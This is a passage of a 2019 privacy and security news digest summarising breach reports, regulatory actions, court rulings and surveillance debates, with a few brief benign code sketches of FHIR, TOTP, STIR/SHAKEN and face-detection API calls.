  1. 15% of breaches were caused by misuse by authorized users;
  2. 29% of breaches involved stolen credentials;
  3. 56% of breaches took months or longer to discover;
  4. C-level executives are increasingly and proactively targeted by social engineering-related breaches;
  5. compromise of web-based email accounts using stolen credentials (98%) is rising, and was seen in 60% of attacks involving hacking a web application;
  6. one quarter of all breaches are still associated with espionage;
  7. ransomware attacks are still strong, accounting for 24% of the malware incidents analyzed and ranking second in most-used malware varieties; and
  8. discovery of cryptomining malware gets a lot of news, but in this report’s sample it accounted for only roughly 2% of incidents.

[IT World Canada | www.scmagazine.com: Verizon Breach Report: Attacks on top executives and cloud-based email services increased in 2018 | threatpost.com: Verizon Data Breach Report: Espionage, C-Suite and Cloud Attacks on the Rise | enterprise.verizon.com: 2019 Data Breach Investigations Report – Executive Summary (PDF) | enterprise.verizon.com: 2019 Data Breach Investigations Report – Full Report (PDF)]

US – Employees Often the Weakest Link

According to new research from MediaPRO, organizations are failing to train employees on how to handle data with privacy regulations in mind [2019 Eye on Privacy Report PR]. And it isn’t just the new regulations [such as GDPR and the California Consumer Privacy Act (CCPA)] where employees are in the dark about best practices. The study found 58% of employees said they had never heard of the PCI Standard for credit card data protections [see FAQ]. The IT department was found to be least aware of what constitutes sensitive data, with 73% in the tech sector ranking Social Security numbers as most sensitive, compared to 88% of employees in all other sectors. MediaPRO’s chief strategist Tom Pendergast found the most surprising result in the study to be the generally poor performance of people across this spectrum, especially since cybersecurity and data privacy are headline news. People also don’t connect privacy and security between work and their personal lives. “If they haven’t personally been impacted by identity theft, it doesn’t seem like a big deal,” he said. “When we build our training and reinforcement, we’re really trying to give people a reason to care about privacy, and to apply what they learn to both their home and their work lives.” Security and privacy aren’t the same issue, but best practices and employee training should follow a similar path because, Pendergast pointed out, the distinctions are not all that meaningful to most people: “I think it feels pretty continuous to most folks, and I often urge people to combine their security and privacy awareness efforts in order to make them more meaningful and more practical to people.” Pendergast advised building your program and policies around the highest privacy standards and educating people on the core principles and actions they need to know in order to follow the new standards. [Security Boulevard]

Finance

CA – OPC Views on Open Banking for Canadian Consumers

On May 9, the Deputy Commissioner of Policy and Promotion of the Office of the Privacy Commissioner of Canada, Gregory Smolynec, appeared before the Standing Senate Committee on Banking, Trade and Commerce [meeting details & watch] to examine and report on the potential benefits and challenges of open banking for Canadian financial services consumers, with specific focus on the federal government’s regulatory role. In his prepared remarks, he discussed his previous recommendations and the potential risks of open banking. His recommendations, made in the past and repeated here, included that:

  1. express meaningful consent be obtained from consumers;
  2. both technical and privacy standards be developed to ensure consistent ground rules;
  3. companies be accredited or licensed before being authorized to participate; and
  4. PIPEDA be reformed to provide the OPC with stronger enforcement powers, including the power to make orders, impose fines for non-compliance with the law, as well as the right to independently verify compliance, without grounds, to ensure organizations are truly accountable for protecting personal information. [Privacy Commissioner of Canada]

CA – ‘An Incredibly Troubling Notion’: Drastic New Tool to Fight Money Laundering Alarms Civil Rights Advocates

B.C. has a $7.4-billion problem: that’s the bottom line of two bombshell reports on money laundering released this week. The reports make dozens of suggestions for tackling the issue, but civil liberties advocates were alarmed to see unexplained wealth orders (UWOs) among the recommendations. UWOs go a step beyond civil forfeiture and “allow confiscation without finding the crime,” criminal law expert Maureen Maloney and two co-authors wrote in a new report. “I think it’s an incredibly troubling notion,” said Micheal Vonn, policy director of the B.C. Civil Liberties Association. With UWOs, anyone targeted by the government would be required to prove they bought their property using legitimate sources of income; the province wouldn’t need to show any link to criminal activity. The proposal is fraught with serious issues, like doing away with the presumption of innocence and subverting the rights that shield Canadians from unreasonable search and seizure. According to Vonn, “What you have is a report that basically sets out to say, look, we just don’t have the policing resources or expertise to get at this, so how do we get around the criminal law?” The province already has multiple options for confiscating property linked to crime. B.C. Finance Minister Carole James told CBC News in an email that the government will consider adding UWOs to the list. Vonn worries about the unintended consequences of going down this road: while the intention of a UWO scheme might be to tackle money laundering, even the most well-intentioned laws can end up serving other purposes. “We see it time and time again,” she said. “To say that we would introduce this kind of tool and not expect it to produce abuses would be phenomenally naive.” [CBC News | Comment: Hidden costs to crackdown on dirty money]

FOI

US – ODNI, NSA Publish ‘Statistical Transparency Report’

The U.S. Office of the Director of National Intelligence and the National Security Agency have released the sixth edition of the “Statistical Transparency Report Regarding Use of National Security Authorities.” The report offers a review of the use of warrants and law enforcement activities under the Foreign Intelligence Surveillance Act of 1978. This year’s report shows 9,637 warrantless queries were made for U.S. citizen communications data from NSA databases in 2018. The number of queries is up from 7,512 in 2017. The report also reveals the number of foreign organizations or individuals that were targeted under Section 702 of FISA jumped from 129,080 to 164,770, while the number of U.S. phone call records collected dropped by nearly 100 million. [ZDNet]

Genetics

CA – CBSA Has Used DNA Testing on Some Detainees Since 2016

According to documents obtained by Global News under access-to-information laws, a 2018 report by Vice News, which outlined the Canada Border Services Agency’s (CBSA) use of DNA testing to identify immigration detainees with the assistance of ancestry websites used to find and contact their distant relatives, sent officials into a scramble to figure out what their own rules were for the practice. The privacy rules of DNA/genealogy/ancestry companies have come under scrutiny over the issue of sharing genetic data with third parties such as police and the CBSA. The Vice report and subsequent others prompted a CBSA internal review just one week later, with the goal of creating a national policy to guide the controversial practice of using DNA tests to identify some detainees. A spokesperson for the CBSA confirmed to Global News that work remains underway to create a national policy but did not say when it will come into effect. The documents requested by Global News focused on whether management at the CBSA in Toronto had given approval for the testing, what internal policy it uses in determining when to do DNA testing, what kind of consent was obtained from the detainee, and how often it performs such tests. In response, the assistant director of immigration investigations in Toronto emailed back saying the technique had been used since roughly October 2016 and that cases were being approved by the assistant director of removals in the branch. Responses to the question of how many times the technique had been used were not provided, with officials saying it was not possible to answer because the cases were not logged but only documented within individual case files, which would require searching through all files to determine a response. Another memo in the release package, though, notes there have been discussions within the CBSA about DNA testing of detainees going back to 2008. Officials at the CBSA in Toronto noted in the exchanges that they had been getting written consent from detainees prior to testing. They also said they informed the detainees of the privacy policies of the companies. But others from CBSA headquarters noted among themselves that privacy concerns remain over what happens to the DNA once the CBSA hands it over. As a result, an operational bulletin went out to all branches ordering them to get approval from CBSA headquarters and the case management teams within the agency before doing any further testing, and said all requests for testing must be submitted via email. Those exchanges also noted that DNA testing is not used exclusively in the cases of long-term detainees (those held longer than 99 days). [Global News]

Health / Medical

US – ONC Urges Patients to Consider Benefits, Risks of Third-Party Apps

The U.S. Office of the National Coordinator for Health IT is warning patients to weigh the benefits and risks of sharing electronic health information with third-party apps. “Secondary use of data creates privacy challenges that extend beyond the healthcare industry,” National Coordinator for HIT Don Rucker testified to a Senate committee this week. “Across all business sectors, individuals often have little say with respect to the secondary use and disclosure of their personal data. However, the misuse of health information can have lifelong consequences for the patient.” The ONC proposed a rule in March that calls for health care providers to allow patients to access their electronic health records by way of secure application programming interfaces, which would require certification against HL7’s Fast Healthcare Interoperability Resources (FHIR) standard. [Health Data Management]
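
For context, a FHIR-style API call is an ordinary HTTPS request that returns a JSON resource. The sketch below is a generic illustration rather than ONC or HL7 code: the server URL and token are placeholders, and a real app would obtain its token through an OAuth 2.0 (SMART on FHIR) authorization flow.

    import requests

    BASE = "https://fhir.example.org/r4"  # hypothetical FHIR server base URL
    TOKEN = "access-token-from-oauth"     # placeholder; granted by the provider's auth server

    resp = requests.get(
        f"{BASE}/Patient/123",  # FHIR convention: GET [base]/[resource type]/[id]
        headers={
            "Accept": "application/fhir+json",
            "Authorization": f"Bearer {TOKEN}",
        },
        timeout=10,
    )
    resp.raise_for_status()
    patient = resp.json()       # a FHIR Patient resource as a Python dict
    print(patient.get("name"))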

Identity Issues

WW – Report Highlights Potential Economic Benefits of Digital IDs

The McKinsey Global Institute has released a report on the economic benefits of strong digital identification. The institute developed a framework to help understand the economic impact of digital IDs. The framework was formed by an analysis of the ways digital IDs are used in countries such as the U.S., U.K., India, Brazil, Nigeria and China. “We hope our initial research effort contributes to a greater understanding of how digital ID, designed with the right principles, implemented with strong controls, and enforced with well-considered policies, can create significant economic benefits for individuals and institutions and can protect individuals from the risk of abuse,” the report states. [McKinsey]

CA – Banks, Telecoms Work Together on Canadian Digital ID System

Canadian banks and telecoms are launching Verified.Me, a new digital ID system that will assist in accessing insurance and credit reporting services. The two industries have begun merging customer data onto Verified.Me’s app in hopes that the database will eventually extend its reach to business, health and government services. For security purposes, only individuals and organizations screened and accepted to the network will be able to obtain data from the app. TD Bank, Royal Bank of Canada, Scotiabank, CIBC and Desjardins, with Bank of Montreal and National Bank of Canada, are among the companies joining the system. [Motherboard]

CA – Securekey’s Verified.Me Digital Identity Network Goes Live

A secure online login platform that the CRA and Toronto-based SecureKey tested in a proof of concept late last year [see news coverage] is now live in Canada. Announced today [see PR] in partnership with Canada’s biggest banks, a ‘digital identity network’ called Verified.Me is available to CIBC, Desjardins, RBC, Scotiabank and TD customers in Canada. The company stated that BMO Bank of Montreal, National Bank of Canada and Sun Life Financial plan ‘to launch soon.’ Verified.Me is a mobile app, available on both iOS and Android, that aims to keep your digital identity safe online, specifically for any government documents and financial services. Verified.Me uses blockchain technology “to securely and privately transfer your personal information to trusted network participants.” If you download the app, you will consent to share your personal info from its Connections tab, and the company states you can “always stay in control by choosing when to share your information and with whom, reducing unnecessary oversharing of personal information in order to access the services you want.” Apart from the above financial institutions, the organizations that helped develop the Verified.Me technology include the Digital ID and Authentication Council of Canada (DIACC), the U.S. Department of Homeland Security Science and Technology Directorate (DHS S&T), Global Privacy and Security by Design, EnStream, Equifax, IBM and Prodigy Labs. [MobileSyrup | SecureKey launches federated digital ID product for Canadian bank customers | Canada’s banks launch SecureKey’s Verified.Me digital identity network | SecureKey launching online identification service backed by Canada’s big banks]

Law Enforcement

US – Law Enforcement Use of Facial-Recognition Tech Raises Alarms

Oregon’s Washington County Sheriff’s Office is implementing Rekognition, Amazon’s artificial-intelligence tool, into its surveillance efforts. Using a database of 300,000 mugshots taken since 2001, the sheriff’s department logged 1,000 facial searches with Rekognition last year, which helped improve police activity, including making arrests. Defense attorneys, artificial-intelligence researchers and civil rights advocates argue that the growth in policing by algorithm could lead to wrongful arrests or threats to privacy with instances of mistaken identity from inaccurate identifications by the software. [The Washington Post]

Location

WW – Twitter Accidentally Shares User Location Data with Advertising Partner

Twitter said it may have accidentally collected and shared with an advertising partner the location data of some users accessing its app through Apple devices. In a blog post, the social media platform said the information was not retained and existed in its systems for only a short time, and that it has informed the people whose accounts were impacted to let them know the bug has been fixed. The advertising partner did not receive data such as users’ Twitter handles or other unique account IDs that could have compromised identity, the company said. [Reuters]

Online Privacy

US – App Stores Drop Apps After Warnings of COPPA, FTC Act Violations

The U.S. FTC announced that Apple and Google app stores removed three dating apps that appeared to be violating the Children’s Online Privacy Protection Act and the Federal Trade Commission Act. Ukraine-based Wildec, which operates Meet24, FastMeet and Meet4U, was informed that the apps were accessible to users age 12 and up, which violates COPPA’s age provisions. The apps were also found to violate the COPPA Rule, which requires companies to post clear privacy policies while notifying parents and getting their verifiable consent before collecting, using or sharing the personal information of a child under the age of 13. [FTC.gov]

WW – Google Will Soon Let You Auto-Delete Your Location Tracking Data

Google is introducing a new feature for your Google account that will allow you to automatically delete your Location History and Web and App Activity data after a set period of time [see Google blog notice]. You’ll be able to have the data deleted after either three or 18 months, and it will then continue to be deleted on a rolling basis over time. The search giant’s location tracking practices got it into trouble last year when it emerged that Google would continue to track you even when you turned off the Location History setting [see news coverage]. In order to entirely stop your location from being tracked, you need to dig through your settings to also turn off the “Web and App Activity” setting. The feature being announced today deletes data for both, meaning that it should cover every bit of the location history data Google holds on you. Google says it’s rolling out the new feature worldwide “in the coming weeks” and that it will be available in addition to the existing options that allow you to delete this data manually. The company also mentions that Location History and Web and App Activity data are the first two bits of user data the feature will be available for, suggesting that the option might soon be available for more of your data. [The Verge | Google now lets you auto-delete your app activity, location and web history | Tracking Phones, Google Is a Dragnet for the Police | Google can see where you’ve been. So can law enforcement | Android 101: How to stop location tracking | Google still tracks you through the web if you turn off Location History | IT Pro | Google may let users limit tracking in Chrome | Google Prepares to Launch New Privacy Tools to Limit Cookies | Google will soon let you auto-delete your location tracking data | The Wall Street Journal | www.cnet.com: Google will now let you automatically delete location and activity history. Here’s how | www.zdnet.com: Google adds option to auto-delete search and location history data | www.washingtonpost.com: Google will soon allow users to auto-delete location history and search data]

Other Jurisdictions

AU – Data-Driven Political Campaigns are Common Practice in Australia

As Australia prepares for elections this month, the country is one of the most susceptible to online information gathering by political campaigns. Australia’s privacy laws do not cover political parties and candidates, which have access to electoral roll data featuring the names and addresses of 16 million compulsory voters. Political parties also use voter email addresses to match social media profiles and then combine those results with the roll data. “Most Australians have little idea about how many data points organisations like political parties, let alone Facebook, have on each of them,” Macquarie University Political Scientist Glenn Kefford said. “They would be shocked and probably disgusted.” [Reuters]

Privacy (US)

US – NIST Seeks Feedback for Privacy Framework Discussion Draft

The U.S. National Institute of Standards and Technology has started to accept feedback on the recently released discussion draft for its privacy framework. NIST seeks feedback on whether the privacy framework can be implemented with the structure of the “Framework for Improving Critical Infrastructure Cybersecurity,” as well as its coverage of privacy risk management and the informative references found within the document. “In general, NIST is interested in whether the Privacy Framework as proposed in this discussion draft could be readily usable as part of an enterprise’s broader risk management processes and scalable to organizations of various sizes — and if not, how it could be improved to suit a greater range of organizations,” the agency wrote in the announcement. Editor’s Note: NIST is hosting a Privacy Framework Roundtable here at the Global Privacy Summit, starting at 3:30 p.m. [NIST.gov]

US – Facebook, FTC Nearing Deal with 20-Year Oversight

The U.S. Federal Trade Commission is close to finalizing a settlement with Facebook that would include 20 years of oversight, in addition to previously reported fines. While an official agreement is not expected before the end of May, Facebook is already preparing for its fine after recently setting aside $3 billion. The reported oversight clause in this potential deal draws a parallel to a similar clause in the 2011 settlement between the FTC and the social network. [CNBC]

US – Amazon’s Kid-Friendly Echo Dot Is Under Scrutiny for Alleged Child Privacy Violations

A coalition of 19 child and privacy advocacy groups filed a complaint with the Federal Trade Commission [PR] claiming that Amazon’s Echo Dot Kids devices are unlawfully recording and storing the conversation data of young children. The coalition accuses Amazon of unlawfully storing data from conversations with children even after parents try to delete it. If true, the practice could violate the Children’s Online Privacy Protection Act (COPPA) [see FTC guidance]. Amazon’s Echo Dot Kids devices launched last year as a child-friendly version of the company’s other Alexa devices. However, the FTC filing alleges that the voice-activated device collects and stores the transcripts of conversations the children have with it, along with information on what content the young users engage with on the device. Likewise, Senators Ed Markey (D-MA), Josh Hawley (R-MO), Richard Blumenthal (D-CT), and Dick Durbin (D-IL) sent a letter to the FTC on May 9 requesting that the agency open an investigation into the matter, writing: “We urge the Commission to take all necessary steps to ensure their privacy as ‘Internet of Things’ devices targeting young consumers come to market, including promptly initiating an investigation into the Amazon Echo Dot Kids Edition’s compliance with COPPA.” [The Verge | U.S. senators say Amazon smart speaker for kids violates privacy law | FTC complaint alleges Amazon’s Echo Dot Kids violates child privacy law | Alexa, does the Echo Dot Kids protect children’s privacy?]

US – Privacy-Minded U.S. Lawmakers Divided Over Giving More Powers to FTC

At the hearing of a House of Representatives Energy and Commerce subcommittee [docs, watch], Democratic and Republican lawmakers both stressed the need for bipartisan privacy legislation, but some had doubts about strengthening the Federal Trade Commission, which is expected to be tasked with enforcing an eventual law. U.S. Congresswoman Cathy McMorris Rodgers said that she would support a national standard for data privacy and wanted to hold companies accountable for violations, but she worried about giving more power to the agency, saying she did not want the FTC to be converted into “a massive rule-making regime.” FTC Chairman Joseph Simons asked for enhanced rule-making authority for the agency to enforce any privacy legislation but pressed for it to be limited to that one issue; backed by Democratic Commissioner Rohit Chopra, he urged that any legislation have clear and specific rules. “Please do not do it. Do not give us broad rule-making authority. Give us targeted rule-making authority,” he said. “The last thing that we want is for you to dump that question on us.” Simons and one of the four commissioners were also asked about an expected FTC settlement with Facebook Inc for violating a privacy consent decree and tightening oversight of users’ privacy. Both declined comment. [Reuters | FTC Members Unanimously Press Congress for Tough National Privacy Protections | FTC Testifies Before the House Energy and Commerce Subcommittee On Its Work to Protect Consumers and Promote Competition]

US – New Requirements for FTC Data Security Settlements

Two of the FTC’s most recent data security settlements include new requirements that go beyond previous data security settlements. The new provisions: 1) require that a senior corporate officer provide to the FTC annual certifications of compliance; and 2) specifically prohibit making misrepresentations to the third parties conducting required assessments. A statement accompanying these settlements noted that the FTC has instructed staff to examine whether its privacy and data security orders could be strengthened and improved. The first matter is an administrative settlement with James V. Grago, Jr. doing business as ClixSense.com, a website where users earn money by viewing advertisements, performing online tasks, or completing online surveys [complaint & settlement]. The settlement has been put out for public comment. The second action involves UNIXIZ doing business as i-Dressup.com, and its CEO Zhijun Liu and its secretary Xichen Zhang. i-Dressup.com is a website that allows users, including children, to play dress-up games, design clothes, and decorate their online spaces. In January 2016, i-Dressup had at least 2.1 million users, of which approximately 245,000 were under the age of 13 years. [see complaint & stipulated judgment] The public will have an opportunity to comment on the ClixSense settlement because it is an administrative matter that is not final until after the comment period ends. It is likely that there will be comments on the new provisions identified above. [DBR on Data (DrinkerBiddle)]

Security

US – Report: C-Suite Execs Increasingly Targeted In Social Attacks

Verizon’s “Data Breach Investigations Report” found cyberattacks against C-suite executives are on the rise. The 2019 study found high-level executives are 12 times more likely to be the target of “social incidents” and nine times more likely to be targeted in social breaches. The report also found cyberattacks conducted by nation states represented 23% of the data breaches examined in 2019, up from 12% the previous year. In cases involving malware, ransomware was the second most common type of those incidents, representing 24% of the cases. [ZDNet]

CA – 56% Increase in Privacy Breaches in First Quarter of 2019: OIPC NL

The number of reported privacy breaches increased in the first quarter of 2019. The Office of the Information and Privacy Commissioner [OIPC] says it received 75 privacy breach reports from 21 separate public bodies in the first three months of the year [PR]. That is a 56% increase in the number of breaches from the previous reporting period, and is higher than the 58 or 59 breaches reported quarterly in 2018. The agencies or departments with the highest number of breaches during the first quarter of 2019 were the departments of Advanced Education, Skills and Labour, Service NL, Justice, Children Seniors and Social Development, and Memorial University. Most of the breaches—34—were by email while 19 were through mail-outs. There were two willful breaches. The OIPC is offering privacy breach training to any public body that seeks it out. [VOCM News (St. John’s)]

WW – Unsecure Customer Loyalty Programs are Ripe for Hacking Schemes

Retail rewards programs are becoming some of the most susceptible targets for hackers as companies digitize. California-based Javelin Strategy & Research found that loyalty program hacks doubled from 2017 to 2018, while an unnamed loyalty-fraud prevention group estimated in its own report that loyalty program–related crime produces $1 billion a year in losses. Hackers access loyalty programs not only to steal account information and gain access to other accounts, but also to steal or sell loyalty point balances. Such schemes have been employed against programs at McDonald’s, Dunkin’ Donuts, Marriott and Hilton. Some of the companies offering loyalty programs have begun implementing stronger security measures, like multi-factor authentication. [New York Times]
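
As a sketch of the multi-factor defence mentioned above, a loyalty program could pair passwords with time-based one-time passwords (TOTP). The example below uses the third-party pyotp library; the member address and issuer name are placeholders, and a real deployment would persist one secret per account.

    import pyotp

    # At enrolment: generate a per-account secret and show it to the member
    # as a provisioning URI / QR code they can load into an authenticator app.
    secret = pyotp.random_base32()
    totp = pyotp.TOTP(secret)
    print(totp.provisioning_uri(name="member@example.com", issuer_name="RewardsCo"))

    # At login: accept the password only together with a valid current code.
    def second_factor_ok(user_code: str) -> bool:
        return totp.verify(user_code)  # checks the code for the current 30-second window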

Smart Cities and Cars

CA – Sidewalk Lab Smart City Project Threatens Privacy and Human Rights: Amnesty Intl

Sidewalk Toronto, a joint venture between Sidewalk Labs, which is owned by Google parent company Alphabet Inc., and Waterfront Toronto, is planning a high-tech neighbourhood called Quayside for the city’s eastern waterfront. The 12-acre smart city will be underpinned by a network of sensors and other connected technology that will monitor and track environmental and human behavioural data. Sensors and cameras throughout the neighbourhood would effectively create a “digital layer”, which may result in the monitoring of individuals’ actions and the collection of their data. According to Daniella Barreto [LinkedIn], a digital activism coordinator for Amnesty International Canada, the project will normalize mass surveillance and is a direct threat to human rights [read her April 27 article]. In the Responsible Data Use Policy Framework released last year, the Sidewalk Toronto team made a number of commitments with regard to privacy. However, Barreto argues that in the Sidewalk Labs conversation, privacy has been framed as a purely digital tech issue. Debates have focused on questions of data access: who owns it, how it will be used, where it should all be stored and what should be collected. In other words, the project would collect the minutest information about an individual’s everyday living. For example, it could track what medical offices they enter, what locations they frequent and who their visitors are, in turn giving away clues to physical or mental health conditions, immigration status, whether an individual is involved in any kind of sex work, their sexual orientation or gender identity, or the kind of political views they might hold. That, further down the line, could affect their health coverage, employment, where they are allowed to live, or where they can travel. All of this raises a question: do citizens want their data to be collected at this scale at all? That conversation remains long overdue. [Packt | See also: 5G Wireless Apocalypse: Smart City of Surveillance | Sidewalk Labs: What public sector data governance would look like]

Telecom / TV

US – Verizon, T-Mobile, Sprint, and AT&T Hit with Class Action Lawsuit Over Selling Customers’ Location Data

On May 2, lawyers filed lawsuits in US district court in Maryland against T-Mobile [complaint], AT&T [complaint], Sprint [complaint] and Verizon [complaint]. The lawsuits, filed by Z LAW, a Maryland “consumer protection law firm,” are the first instance of individual telco customers pushing to be awarded damages after Motherboard revealed in January that AT&T, T-Mobile, and Sprint had all sold access to the real-time location of their customers’ phones to a network of middlemen companies, with that access ending up in the hands of bounty hunters. Motherboard previously paid a source $300 to successfully geolocate a T-Mobile phone through this supply chain of data. The thrust of the complaints centers on whether each telco violated Section 222 of the Federal Communications Act (FCA), which says that the companies are obligated to protect the CPI and CPNI of their customers, and whether the Plaintiffs’ and Class Members’ CPNI was accessible to unauthorized third parties during the relevant period. The class in each lawsuit covers an approximation of the telcos’ individual customers between April 30, 2015 and February 15, 2019: 100 million for Verizon, 100 million for AT&T, 50 million for T-Mobile, and 50 million for Sprint. Each lawsuit is filed in the name of at least one customer for each telco, and they are seeking unspecified damages to be determined at trial. Motherboard also previously reported that 250 bounty hunters had access to AT&T, T-Mobile, and Sprint phone location data from another company that catered specifically to the bail bond industry. Some of that data included highly precise assisted GPS data, which is usually reserved for 911 responders. [Vice | Major Carriers Hit With Lawsuits Over Location Data Sharing]

US – Massachusetts High Court Rules on Constitutional Protection for Cell Phone Location Data

On April 23 the Supreme Judicial Court of Massachusetts released its ruling in Commonwealth v. Almonor [summary & ruling], and on April 24 the court released its ruling in Commonwealth v. Fredericq [PDF], both rulings addressing law enforcement access to and use of cell phone location data. In Almonor, the court found that pinging a cell phone’s real-time location constitutes a search in the constitutional sense. In Fredericq, the court held that warrantless location tracking was an unlawful search and that information obtained as a result of that tracking was “fruit of the poisonous tree” that the defendant could suppress. The rulings acknowledge the challenges inherent in adapting age-old legal concepts to new technology, but also show that some invasions of privacy may be permissible depending upon the circumstances. While the court’s decisions addressed Article 14 of the Massachusetts Declaration of Rights rather than the Fourth Amendment to the U.S. Constitution, the analytical decisions may offer guidance as to how other courts may rule on similar issues in the absence of on-point precedent from the U.S. Supreme Court. The rulings in these cases are consistent with a societal expectation that merely using a cell phone does not constitute consent to government tracking of one’s location. But that does not mean that the government is precluded from obtaining location information. Just as the courts are tasked with crafting jurisprudence that “can adapt to changes in the technology of real-time monitoring,” law enforcement will need to find ways to permissibly obtain the wealth of information that cell phones contain. A concurring opinion in Almonor suggested that the legislature could assist this task by drafting legislation to permit telephonic or electronic requests for search warrants, rather than requiring police to appear in front of a judge. As the judiciary and law enforcement grapple with the scope of state and federal constitutional privacy rights, the Almonor and Fredericq decisions may serve as persuasive guideposts. [Technology Law Dispatch (ReedSmith)]

US – FCC Proposes Blocking Robocalls by Default

The Federal Communications Commission (FCC) has been fighting robocalls for years, but as anyone with a cell phone can tell you, they’re still getting through. Now, the Commission wants to make it legal for phone companies to block unwanted robocalls by default. Chairman Ajit Pai has circulated a declaratory ruling [read Pai blog post, 2 pg ruling & fact sheet] that, if adopted, would give carriers permission to develop new call-blocking tools. The ruling could also allow consumers to prohibit calls from numbers that aren’t on their contact lists. The proposed change targets spam robocalls that hijack legitimate, in-service numbers. Carriers like Comcast, T-Mobile, AT&T and Verizon are working to deploy STIR/SHAKEN technology, which labels calls from authentic numbers. But the FCC says many voice providers have held off on developing call-blocking tools because it was unclear whether those tools were legal under FCC rules. If adopted, this ruling could lead to new call-blocking tools, like those used by third-party apps. The systems would include protections against blocking emergency calls, and consumers would be able to opt out of call blocking if they wish. The FCC will consider the proposal at its June 6th meeting [details], and if approved, it’s hard to say when it will go into effect. On May 15, Pai and four other FCC commissioners also testified before the Subcommittee on Communications and Technology of the House Committee on Energy & Commerce about robocalls and other FCC business [details & documents here & watch here starting at 11:19]. [engadget | The FCC Wants Carriers to Start Automatically Blocking Robocalls for Free | How to stop pesky robocalls and texts to your cell phone]
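
For the technically curious, the heart of STIR/SHAKEN is a signed token (a PASSporT, per RFC 8225) that the originating carrier attaches to a call and the terminating carrier verifies before labelling it. The sketch below is a heavily simplified illustration using the PyJWT and cryptography libraries with a locally generated key; real deployments sign with certificates issued under the SHAKEN governance framework, and the numbers and URL here are invented.

    import time
    import jwt  # PyJWT, with the 'cryptography' package installed for ES256
    from cryptography.hazmat.primitives.asymmetric import ec

    key = ec.generate_private_key(ec.SECP256R1())  # stand-in for the carrier's signing key

    claims = {
        "attest": "A",                  # full attestation: the carrier knows this caller
        "orig": {"tn": "12025551000"},  # originating telephone number
        "dest": {"tn": ["12025552000"]},
        "iat": int(time.time()),
        "origid": "de305d54-75b4-431b-adb2-eb6b9e546014",  # opaque call identifier
    }

    token = jwt.encode(
        claims, key, algorithm="ES256",
        headers={"ppt": "shaken", "x5u": "https://cert.example/carrier.pem"},
    )
    print(token)  # carried in the SIP Identity header and verified downstream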

US Legislation

US – California Assembly Privacy Committee Votes in Favor of Advancing CCPA Amendments

On April 30, the California Assembly’s Committee on Privacy and Consumer Protection, which has jurisdiction over matters related to privacy, the protection of personal information and information technology, held a committee hearing [agenda] in which it voted in favor of advancing eight industry-backed bills that would amend the California Consumer Privacy Act (CCPA) [infographic], set to take effect on Jan 1, 2020. To the benefit of businesses, the bills, which now move on to the Assembly’s Appropriations Committee, would clarify the text and limit the scope of the unprecedented, sweeping privacy law that grants consumers a great degree of transparency and choice with respect to their personal information, defined broadly under the act. If the bills survive the Assembly’s Appropriations Committee, they will come before the full Assembly before advancing to the California Senate, and would ultimately become law if signed by the governor. Also of note, two CCPA amendment bills, discussed further below, have been withdrawn from advancement to committee consideration. Two bills were withdrawn from committee consideration – AB 1760 – Privacy for All Act here and SB 753 – Narrowing the Definition of Sale here] The Assembly Privacy Committee voted to move the following bills that would amend the CCPA forward [description/discussion of the eight bills make up the remainder of this blog post]:

  1. AB 25 – Carving Out Employee Data [see here];
  2. AB 846 – Exception for Customer Loyalty Programs [see here];
  3. AB 873 – Clarifying the Definitions of “Personal Information” and “Deidentified” [see here];
  4. AB 874 – Refining the Meaning of “Personal Information” and “Publicly Available” [see here];
  5. AB 1564 – Consumer Rights Requests [see here];
  6. AB 981 – Insurance Information [see here];
  7. AB 1146 – Exception for Vehicle Repair Information [see here]; and 8) AB 1355 – Revising Drafting Errors [see here] [Data Privacy Monitor]

Workplace Privacy

CA – Privacy Rules on Employee Monitoring Differ Between Provinces

Lexology reports on Canadian privacy laws that cover tracking employees’ activities. The provinces of Quebec, British Columbia and Alberta have legislation on the collection, use and disclosure of personal information in the private sector; however, Ontario has rules on the use of personal health information in the same area. In order to address the patchwork of laws across Canada, employers are advised to disclose any monitoring activity they conduct, establish their rationale for any form of tracking, create a clear policy on any data collection practices, and obtain employee consent. [Lexology]

+++

 

15-30 April 2019

Biometrics

EU – EU Parliament Votes to Create Biometrics Database

European Union lawmakers are going forward with the creation of a database that collects biometric data for all non-EU citizens in Europe’s visa-free Schengen area. The system would bring together current databases that track migration, travel and crime and is expected to be approved by the European Parliament. This new database will be known as the Common Identity Repository (CIR) and is set to unify records on over 350 million people. CIR will aggregate both identity records (names, dates of birth, passport numbers, and other identification details) and biometrics (fingerprints and facial scans), and make its data available to all border and law enforcement authorities. The plans for the all-encompassing system go against the EU’s position in 2010 when it said such a database would “constitute a gross and illegitimate restriction of individuals’ right to privacy and data protection” and “pose huge challenges in terms of development and operation.” Data protection professionals believe the system is unnecessarily invasive, while former member of the European Commission’s Security Advisory Group Reinhard Kreissl said the database “could be useless, or even counterproductive.” [Politico | ZDNet]

US – NYT Builds Facial-Recognition System for $60 for ‘The Privacy Project’

As part of its recent launch of “The Privacy Project,” The New York Times reports on the facial images it was able to collect through cameras at Bryant Park. For the study, the Times gathered public images captured by three cameras that surveyed a section of the park. One day of footage was run through Amazon’s commercial facial-recognition service, which resulted in 2,750 faces detected over a nine-hour period. The Times reports the total cost of all the work came to $60. In an op-ed for “The Privacy Project,” Charlie Warzel writes why it is time to “radically expand” the definition of privacy. [The New York Times]
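
To give a sense of how little engineering this takes, the sketch below shows the general shape of a face-detection call to Amazon Rekognition using the boto3 SDK; the bucket and file names are invented, and the Times has not published its actual pipeline beyond the article’s description. DetectFaces is billed per image, which is consistent with the roughly $60 total the Times reports for nine hours of sampled footage.

    import boto3

    rekognition = boto3.client("rekognition", region_name="us-east-1")

    # Detect faces in one video frame previously uploaded to S3.
    resp = rekognition.detect_faces(
        Image={"S3Object": {"Bucket": "park-footage", "Name": "frame-0001.jpg"}},
        Attributes=["DEFAULT"],  # bounding box, pose and basic landmarks only
    )
    for face in resp["FaceDetails"]:
        print(face["BoundingBox"], face["Confidence"])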

Big Data / Analytics / Artificial Intelligence

US – Big Data Companies Face Increased State and Federal Scrutiny

Norton Rose Fulbright’s US Head of Data Protection, Privacy and Cybersecurity Jeewon Serrato and Partner Vic Domen write about the increased scrutiny that big data companies like Google and Facebook are now facing. A number of state attorneys general are preparing to have discussions with the US Federal Trade Commission to discuss their concerns about the use of massive amounts of personal data in the digital ad marketplace. There is a trend among federal and state enforcers to bring these online platforms and technology markets under higher scrutiny. [Norton Rose Fulbright LLP]

Canada

CA – OPC Releases Discussion Document for Trans-Border Data Flow Consultation

